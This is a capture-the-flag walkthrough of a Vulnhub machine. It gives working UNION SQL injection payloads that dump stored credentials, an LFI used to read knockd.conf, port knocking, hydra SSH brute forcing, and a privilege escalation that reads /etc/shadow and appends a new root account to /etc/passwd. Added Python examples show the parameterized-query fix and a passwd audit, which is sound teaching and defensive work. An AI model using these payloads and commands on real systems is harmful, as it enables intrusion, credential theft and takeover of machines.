This Vulnhub image is a machine that I considered very fun to go through, as it allowed me to better understand SQL injection and yet another interesting privilege escalation technique. The machine can be initially exploited by doing SQL injection and gathering some credentials. There is an SSH service which is initially in the state of “filtered” and requires “Port Knocking” to open the port; the information needed can be gathered by leveraging an LFI vulnerability. Privilege escalation requires logging in as a specific user to retrieve some passwords and become another user which has sudo permissions on a specific file. Overall the machine is very fun and a lot can be learned from it; the SQL injection I used is completely manual, without using “sqlmap”.
Scanning and Enumeration
From the output we see that the SSH service is being filtered and only port 80 is open. Browsing to the HTTP service displays the following page:
There is also a search option which seems to look for first names and last names.
If we do a common SQL injection it returns all the information from the “Display All Records” option. This is the SQL injection I used:
test' or 1=1 -- -
Since the SQL injection didn’t give me any errors, it seemed like the search was vulnerable, so I started by enumerating the number of columns that I could work with. To enumerate the columns I’ll use an “order by” clause, starting with number 1 and increasing it until it returns an error or stops returning information. I’ll test this using the known first name “mary”, and the syntax of the query will look as follows:
mary' order by 1 -- -
Increasing the number by one, we see that it stops displaying information at “order by 7”, which means the number of columns is 6. The next step is to identify where the information for each column is displayed, so I’ll place a number in each column; this can be accomplished with the following query:
mary' union all select 1,2,3,4,5,6 -- -
From the screenshot we see the location of each column, identified by its number. Now that we know where information can be displayed, we need to enumerate the database version (assuming this is MySQL), which can be done using the following query:
mary' union all select 1,2,3,4,@@version,6 -- -
Knowing the version helps determine how the remaining queries should be written. The next step is to enumerate the databases using the information schema; this is the query used to list the databases:
mary' union all select 1,2,3,4,schema_name,6 from information_schema.schemata -- -
From this information the “users” database seems the most interesting. For now we will enumerate the tables to see what’s interesting; the following query was used to enumerate the tables:
mary' union select all 1,2,3,4,table_name,6 from information_schema.tables -- -
The “UserDetails” table stands out, so I listed its columns with the following query:
mary' union all select 1,2,3,4,column_name,6 FROM information_schema.columns where table_name='UserDetails' -- -
There are 6 fields in total, but the ones we are interested in are the “username” and “password” fields. To display only this information from “UserDetails”, I will put the usernames in column 4 and the passwords in column 5; this is the query I used:
mary' union all select 1,2,3,concat(username),concat(password),6 FROM users.UserDetails -- -
We will get different usernames and passwords (the screenshot is only a fraction of all).
Querying the “Users” table in the default database with the same column layout returns another set of credentials:
mary' union all select 1,2,3,concat(username),concat(password),6 FROM Users -- -
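The weakness behind the search form and its fix, as an added example that is not code from the machine or the original writeup: a string-built query next to a parameterized one, using sqlite3 in place of MySQL and a constructed six-column table. The payloads are the ones used above; only the parameterized version treats them as plain data, and only the vulnerable one throws the database error that the “order by” probe relies on.

```python
import sqlite3

# Constructed stand-in for the machine's six-column staff table; all
# names and values here are invented for this example.
ROWS = [
    (1, "mary", "moe", "marym@example.test", "555-0101", "Manager"),
    (2, "julie", "dooley", "julied@example.test", "555-0102", "Staff"),
    (3, "fred", "flintstone", "fredf@example.test", "555-0103", "Staff"),
]

def make_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE Staff(id, firstname, lastname, email, phone, position)")
    con.executemany("INSERT INTO Staff VALUES (?,?,?,?,?,?)", ROWS)
    return con

DB = make_db()

def search_vulnerable(con, term):
    # Input is spliced into the statement, so quotes, OR, UNION and
    # comments typed by the user become part of the SQL grammar.
    sql = ("SELECT * FROM Staff WHERE firstname = '%s' OR lastname = '%s'"
           % (term, term))
    return con.execute(sql).fetchall()

def search_fixed(con, term):
    # Bound parameters: the driver passes the input as data only, so
    # "test' or 1=1 -- -" is simply a name nobody has.
    sql = "SELECT * FROM Staff WHERE firstname = ? OR lastname = ?"
    return con.execute(sql, (term, term)).fetchall()

def raises_db_error(search, con, term):
    """True if the search raises a database error for this input.
    An unexpected database error on search input is a signal worth alerting on."""
    try:
        search(con, term)
    except sqlite3.Error:
        return True
    return False

if __name__ == "__main__":
    payload = "test' or 1=1 -- -"
    print("vulnerable:", len(search_vulnerable(DB, payload)), "rows")
    print("fixed:     ", len(search_fixed(DB, payload)), "rows")
```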
With this password I was able to log in as the admin user by going to the “Manage” option.
Once logged in we see at the bottom a message that says “File does not exist”, as if the page were looking for a file, so by trying a very common LFI technique I was able to read files from the system.
Basically all the users I saw earlier have access to the machine, and the passwords we got might allow me to get into it, but from the nmap report we know that the SSH port is being filtered. This could mean that it is either restricted by IP or that we are dealing with “port knocking”. Taking advantage of the LFI, I attempted to read a knockd.conf file, if available, and was able to successfully get information from such a file.
Great, now all we have to do is knock the sequence of ports shown in the file using nmap. Port knocking with nmap using those port numbers can be accomplished with the following command:
nmap -p 7469,8475,9842 --max-retries 0 192.168.80.132
The SSH port was successfully opened. I placed the credentials obtained earlier in two separate files, one for usernames and one for passwords, and then used hydra to brute force SSH and see which users had SSH access. This is the command I used for hydra:
hydra -L usernames.txt -P passwords.txt 192.168.80.132 ssh
For privilege escalation I started by checking sudo permissions and the files in the home directories of the users I had access to; listing the files and directories in the home folder of the user “janitor” revealed a file with some new passwords.
I was able to get valid credentials for the user “fredf”, and logging in as fredf over SSH shows that he has sudo permission to execute a file named “test”.
It seems like I need to give it some parameters, and the words “read” and “append” suggest that it can read a file and append its contents to another file, so let's try that. I’ll attempt to read the shadow file and append it to a file in the /tmp folder named “myshadow” with the following command:
sudo /opt/devstuff/dist/test/test /etc/shadow /tmp/myshadow
To become root I thought that it would be great to add another user with root privileges to the passwd file. The process I followed to generate an entry for the new user can be learned from here: https://hacknpentest.com/linux-privilege-escalation-via-writeable-etc-passwd-file/. I’ll first generate an encrypted password using Perl; this is the command I used:
perl -le 'print crypt("mystrongpassword","salt")'
I then write the new entry to a temporary file and use the sudo permission on “test” to append it to /etc/passwd:
echo "newroot:samIllSUTVKpo:0:0:Similar_to_root:/root:/bin/bash" > /tmp/newuser
sudo /opt/devstuff/dist/test/test /tmp/newuser /etc/passwd
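A defender's counterpart to the passwd trick above, added here and not part of the original writeup: a small audit that flags the artefacts this technique leaves behind in /etc/passwd (an extra UID 0 account, a hash where the “x” shadow marker should be, empty or malformed entries). The sample passwd text is constructed; its “newroot” line mirrors the entry built above.

```python
# Constructed /etc/passwd excerpt for this example. The "newroot" line has
# the shape of the entry the walkthrough appends with the sudo-able binary.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
fredf:x:1001:1001:Fred Flintstone:/home/fredf:/bin/bash
newroot:samIllSUTVKpo:0:0:Similar_to_root:/root:/bin/bash
"""

def parse_passwd(text):
    """Split passwd text into 7-field entries; return (entries, bad_line_numbers)."""
    entries, bad = [], []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip():
            continue
        fields = line.split(":")
        if len(fields) != 7:
            bad.append(lineno)
        else:
            entries.append(fields)
    return entries, bad

def audit_passwd(text):
    """Return (account, reason) findings for the indicators a writable
    /etc/passwd leaves behind: extra UID 0 accounts, a hash (or nothing)
    in the password field instead of the 'x' shadow marker, malformed lines."""
    entries, bad = parse_passwd(text)
    findings = [("line %d" % n, "malformed entry") for n in bad]
    for name, pw, uid, gid, _gecos, _home, _shell in entries:
        if not (uid.isdigit() and gid.isdigit()):
            findings.append((name, "non-numeric uid/gid"))
            continue
        if uid == "0" and name != "root":
            findings.append((name, "extra UID 0 account"))
        if pw == "":
            findings.append((name, "empty password field (no password)"))
        elif pw not in ("x", "*") and not pw.startswith("!"):
            findings.append((name, "password hash stored in /etc/passwd"))
    return findings

if __name__ == "__main__":
    for account, reason in audit_passwd(SAMPLE_PASSWD):
        print("%-10s %s" % (account, reason))
```

Run against the real file with `audit_passwd(open("/etc/passwd").read())`; a clean system returns an empty list.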